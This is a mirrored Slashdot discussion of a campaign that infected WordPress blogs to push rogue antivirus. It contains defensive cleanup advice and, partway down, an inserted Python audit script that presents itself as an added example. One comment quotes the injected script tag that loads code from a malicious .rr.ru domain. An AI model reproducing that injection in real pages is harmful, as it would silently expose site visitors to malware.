Slashdot Mirror


30K WordPress Blogs Infected With the Latest Malware Scam

alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."

55 of 104 comments

  1. McAfee? by Oswald+McWeany · · Score: 5, Funny

    websites displaying fake antivirus scans

    I didn't know McAfee had started targeting Web blogs now.

    --
    "That's the way to do it" - Punch
    1. Re:McAfee? by tepples · · Score: 3, Informative

      It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains.

    2. Re:McAfee? by Ihmhi · · Score: 1

      Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

      I dunno, sounds like Norton to me.

    3. Re:McAfee? by hairyfeet · · Score: 1

      Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

      As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advantage of the low rights mode for browsers built in, ABP blocks the ads that are the source of many an infection, Avast and Comodo IS have built in sandboxing which adds another layer of protection but while Avast has a simpler UI for home users Comodo IS is free for business AND home so it's really a preference thing.

      With this combo I took an off-lease I was planning to wipe anyway and tried my damnedest to infect the thing. I went to every crapsite and topsite and "punch the monkey to win an iPod" and scammer haven I could find and afterwards ran half a dozen offline scans, nothing. Zip zero zilch nada. Most of the nasty sites were blocked by the Comodo SecureDNS option in Dragon and when I turned that off both Avast and Comodo IS blocked the sites from loading the malware so I'd say that is a resounding success. I know I have customers (as well as family, ugh) that can pick up bugs like a Bangkok whore on a Saturday night yet since switching them over to this combo they have been completely bug free, and with them that's saying a lot.

      --
      ACs don't waste your time replying, your posts are never seen by me.
  2. Analysis by SirDice · · Score: 4, Insightful

    Why do they always focus on the crap that's left behind when they analyze these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was it an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.

    1. Re:Analysis by WankersRevenge · · Score: 5, Informative

      From the fine article:

      Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

    2. Re:Analysis by SirDice · · Score: 1

      Ah, that helps. I only read the WebSense analysis hoping to read some details there. Apart from mentioning WordPress there isn't much in there how they actually got in.

    3. Re:Analysis by drobety · · Score: 4, Informative

      For what it's worth, looking at the recent 404 errors on my site, I've noticed many (failed, fortunately) requests related to Ajax File And Image Manager 1.0 Final Code Execution.

  3. wordpress, again? by v1 · · Score: 1

    Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

    --
    I work for the Department of Redundancy Department.
    1. Re:wordpress, again? by Spad · · Score: 2

      At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

      A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

    2. Re:wordpress, again? by gmack · · Score: 4, Interesting

      Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

    3. Re:wordpress, again? by Anonymous Coward · · Score: 1

      Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

    4. Re:wordpress, again? by nick.sideras · · Score: 4, Informative

      Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

      This drove me nuts at my current job for about 2 months - you need Wordpress Network.

      There's the easy way and the hard(er) way to do this:

      This is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

      This is the more down-and-dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
      Also, this is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

      Once you have a network, you have a fantastic "Update Network" button. Boom. Take the rest of the day off.

    5. Re:wordpress, again? by aussiedood · · Score: 1

      Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*

    6. Re:wordpress, again? by X0563511 · · Score: 1

      That has anything to do with Wordpress?

      Doesn't even make sense. Windows has automatic updating, something Linux distros are just starting to do (notifying has been around for a while, but automatically acting is "new")

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    7. Re:wordpress, again? by ArsenneLupin · · Score: 1

      Or failing to find a specific solution for Wordpress: Use perl's WWW::Mechanize to click that DB upgrade link (and any other GUI-only things) for you.

    8. Re:wordpress, again? by turbidostato · · Score: 1

      "notifying has been around for a while, but automatically acting is "new""

      Do you really consider something that has been available, well, forever as new? (I'll just mention cron-apt as an example).

    9. Re:wordpress, again? by Anonymus · · Score: 1

      WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion or using multisite and just updating once for every site.

    10. Re:wordpress, again? by Hatta · · Score: 1

      You can't automatically log into a website and click a link with a very small shell script?

      --
      Give me Classic Slashdot or give me death!
    11. Re:wordpress, again? by Anonymus · · Score: 1

      I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin is usually written by one person who could just decide to backdoor your site in the next update.

      I've got a couple of moderately popular plugins, and every time I release an update I think about just how easy it would be to take over thousands of sites by just adding a few innocuous-looking lines of code. Except I'm not evil, so I don't.

    12. Re:wordpress, again? by X0563511 · · Score: 1

      It is neither installed or mentioned during a standard system installation. That's the difference.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    13. Re:wordpress, again? by X0563511 · · Score: 1

      Er, no. Try again. Preferably with more reading comprehension.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    14. Re:wordpress, again? by element-o.p. · · Score: 1

      Seriously? It's a hassle to have to log into each server and click a link?

      You must never have run Gentoo*...

      *Which is still my favorite distro, despite occasionally being a real PITA to update.

      --
      MCSE? No, sir...I don't do Windows. Yes, I am an idealist. What's your point?
    15. Re:wordpress, again? by turbidostato · · Score: 1

      "It is neither installed or mentioned during a standard system installation. That's the difference."

      Neither is Apache therefore web servers are the new thing, is that your point?

      Of course not. I know what your point is: that no *true* Scotsman...

    16. Re:wordpress, again? by X0563511 · · Score: 1

      That's funny, that's all I'm hearing from YOU, the AC.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    17. Re:wordpress, again? by X0563511 · · Score: 1

      What?

      What does apache have to do with it? The idiot was talking about OS auto updating, which I pointed out had nothing to do with anything.

      I then went on to say that even if it DID have anything to do with it, he was wrong anyway.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    18. Re:wordpress, again? by gmack · · Score: 1

      I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

    19. Re:wordpress, again? by gmack · · Score: 1

      Awesome, thanks for the heads up.

    20. Re:wordpress, again? by element-o.p. · · Score: 1

      LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*, and a few other problems are really starting to sour me on Ubuntu. I'm hoping 12.04 will bring back the stability I experienced up to 10.10; IMHO, the 11.xx series is Canonical's Vista.

      *Yes, I know, those are proprietary drivers. I can't blame Canonical entirely for that, but IIRC, there are much newer drivers available that aren't available in the official "restricted" repositories.

      --
      MCSE? No, sir...I don't do Windows. Yes, I am an idealist. What's your point?
    21. Re:wordpress, again? by gmack · · Score: 1

      I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

      For servers, it's hard to beat debian + dotdeb repo.

    22. Re:wordpress, again? by mattrad · · Score: 1

      Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

    23. Re:wordpress, again? by Pf0tzenpfritz · · Score: 1

      You mean "the fact that I have failed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

      --
      Oh, the beautiful gloss of greality!
  4. Method of infection by dgharmon · · Score: 3, Insightful

    "The Websense ThreatSeeker Network has detected a new wave of mass-injections of a well-known rogue antivirus campaign"

    How exactly are these sites infected in the first place?

    "The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it"

    Ahh so - nothing to read here ... moving on ...

    --
    AccountKiller
    1. Re:Method of infection by Pope · · Score: 2

      I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

      --
      It doesn't mean much now, it's built for the future.
    2. Re:Method of infection by Rick17JJ · · Score: 1

      A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

      It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several different viruses and types of spyware had been detected in both my registry and on drive C. The funny thing is that Linux does not have a registry and also does not use drive letters to designate hard drive partitions.

      It listed the names of several viruses that my Linux computer was supposedly infected with. Despite knowing that the test was bogus, I looked up those virus names out of curiosity, and found they were all Windows only viruses. Their scareware ad then offered to sell me their antivirus product, to remove the viruses and spyware.

      My understanding is that most desktop users of Linux have never felt the need to use antivirus software, because Linux viruses have never been a problem.

      Despite their supposedly thorough scan of my registry and drive C, they had not noticed that I was not using Windows. Has anyone bothered yet to make a Linux version of their scareware ads?

    3. Re:Method of infection by klui · · Score: 1

      So looks like the injected code
      </DIV> <!-- END body-wrapper -->
      <script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
      </BODY>
      </HTML>

      would be taken care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

  5. Specialist ISP of Transnistria.. again. by Dynamoo · · Score: 5, Interesting
    It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria. That has featured before on Slashdot in this story.

    The block 194.28.112.0/22 is simply all evil (I've documented it here in the past), there's no reason to send traffic to it at all, blocking it is a good option.

    --
    Never email donotemail@WeAreSpammers.com
    1. Re:Specialist ISP of Transnistria.. again. by gaspyy · · Score: 1

      Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arms dealers.

    2. Re:Specialist ISP of Transnistria.. again. by Dynamoo · · Score: 2

      Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

      --
      Never email donotemail@WeAreSpammers.com
  6. Why bother with an infector? by Opportunist · · Score: 2

    Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    1. Re:Why bother with an infector? by DigiShaman · · Score: 3, Interesting

      Agreed. The best form of hacking isn't technical, it's social. This is what happens when con artists turn to technology as another venue by which to exploit people.

      --
      Life is not for the lazy.
    2. Re:Why bother with an infector? by Opportunist · · Score: 1

      About time politicians discover the net as something useful!

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  7. Continued Password Problem by Neutral_Observer · · Score: 1

    Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!

    1. Re:Continued Password Problem by Anonymous Coward · · Score: 1

      Hunter2

      Now get off my lawn!

  8. Re:Its 2012 and yet still... by X0563511 · · Score: 3, Informative

    Are you an idiot? The article is talking about WORDPRESS - a web application! Windows isn't involved!

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  9. For Newbs: Steps to Fix by dgrotto · · Score: 5, Informative

    Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

    1) Backup sites.
    2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
    3) Clean up infected PHP files with this script from php-beginners.com. Thank you Paolo.
    4) Inspect all .htaccess configs for errant redirects and fix.
    5) Install and run the timthumb vulnerability scanner. Possible secondary vector. Thank you Peter Butler!
    6) Update your WP install to latest and greatest.
    7) Remove any unused plugins and themes.
    8) Backup sites.

    I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

    By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for posts - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but it still shocks me how insecure this app is.

    1. Re:For Newbs: Steps to Fix by dgrotto · · Score: 1

      Forgot one thing:

      The hack puts a list of sites to redirect to in a .logs directory. rm these.
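Steps 2 and 4 of dgrotto's list, plus the .logs directory mentioned in the follow-up, are all things a read-only audit can surface before anyone starts deleting files. The following is an added example, not code from the thread, php-beginners.com or WordPress: it walks an install and reports world-writable directories, .htaccess redirect directives that point at hosts other than the site's own, and any directory named .logs. The sample install it builds in a temporary directory is constructed for the demonstration, and the host names and the location of the .logs directory are assumptions.

```python
"""Added example: read-only audit of a WordPress tree for the conditions named
in the thread. It reports; it does not chmod or delete anything."""
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# Hosts that may legitimately appear in a redirect (assumed for the example).
OWN_HOSTS = {"blog.example.org"}

# Apache directives that can send a visitor elsewhere, and a URL matcher.
REDIRECT_DIRECTIVE = re.compile(
    r"^\s*(RewriteRule|Redirect(?:Match|Permanent)?)\s+(.*)$", re.I)
URL_IN_LINE = re.compile(r"https?://[^\s\"']+", re.I)


def audit_wordpress(root, own_hosts=OWN_HOSTS):
    """Walk root and return {check_name: sorted list of findings}."""
    findings = {"world_writable_dirs": [], "external_redirects": [], "logs_dirs": []}
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:      # step 2: o+w directories
            findings["world_writable_dirs"].append(rel)
        for d in dirnames:                                # follow-up: .logs dirs
            if d == ".logs":
                findings["logs_dirs"].append(os.path.normpath(os.path.join(rel, d)))
        if ".htaccess" in filenames:                      # step 4: errant redirects
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if not REDIRECT_DIRECTIVE.match(line):
                        continue
                    for url in URL_IN_LINE.findall(line):
                        host = urlparse(url).hostname
                        if host and host.lower() not in own_hosts:
                            where = os.path.normpath(os.path.join(rel, ".htaccess"))
                            findings["external_redirects"].append(
                                f"{where}:{lineno} -> {host}")
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_install(root):
    """Create a constructed, deliberately sloppy install tree under root."""
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    os.makedirs(os.path.join(root, "wp-content", "plugins", "stale-plugin", ".logs"))
    for dirpath, _, _ in os.walk(root):       # normalise first, regardless of umask
        os.chmod(dirpath, 0o755)
    os.chmod(uploads, 0o777)                  # the world-writable mistake from step 2
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\n"
                 "RewriteRule ^old-page$ https://blog.example.org/new-page [R=301,L]\n"
                 "RewriteCond %{HTTP_REFERER} google [NC]\n"
                 "RewriteRule .* http://redirect-target.invalid/in.php [R,L]\n")
    with open(os.path.join(uploads, ".htaccess"), "w") as fh:
        fh.write("Options -Indexes\n")        # harmless: no redirect directive


def demo():
    """Build the sample tree in a temp dir and audit it; returns the findings."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    build_sample_install(root)
    return audit_wordpress(root)


if __name__ == "__main__":
    for check, items in demo().items():
        print(check)
        for item in items:
            print("   ", item)
```

The redirect check deliberately ignores `RewriteCond` lines and only looks at the directives that actually send a browser somewhere, so a referrer-conditioned rule is reported by its `RewriteRule` line, which is the one to inspect. Point `audit_wordpress()` at a real document root and the output is the worklist for steps 2, 4 and the .logs cleanup; the fixing itself stays a deliberate, backed-up (step 1) manual action.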

  10. Re:Its 2012 and yet still... by NotBorg · · Score: 1

    You're right no one would ever want to involve Windows with their Wordpress install. The year of Windows on the server will never come.

    --
    I want this account deleted.
  11. Related drive-by malware by ThatsNotPudding · · Score: 3, Informative

    BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...

    1. Re:Related drive-by malware by LunaticTippy · · Score: 1

      Norton is malware in my opinion. I wish all the antivirus software would block it.

      --
      Man, you really need that seminar!
  12. Norton tries to provide a working uninstaller by tepples · · Score: 1

    At least Norton tries to provide a working removal tool at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

  13. and I was looking for a blog site by Skapare · · Score: 1

    And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

    --
    now we need to go OSS in diesel cars
  14. Which versions? by sigaar · · Score: 1

    Any idea which versions of Wordpress are being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.

    --
    sigaar
  15. So where does the malware get downloaded to idiot? by Viol8 · · Score: 1

    Wordpress is the vector.

    Fscking moron.

  16. Re:So where does the malware get downloaded to idi by X0563511 · · Score: 1

    So? The article is talking about the vector, not the payload.

    Fscking moron.

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...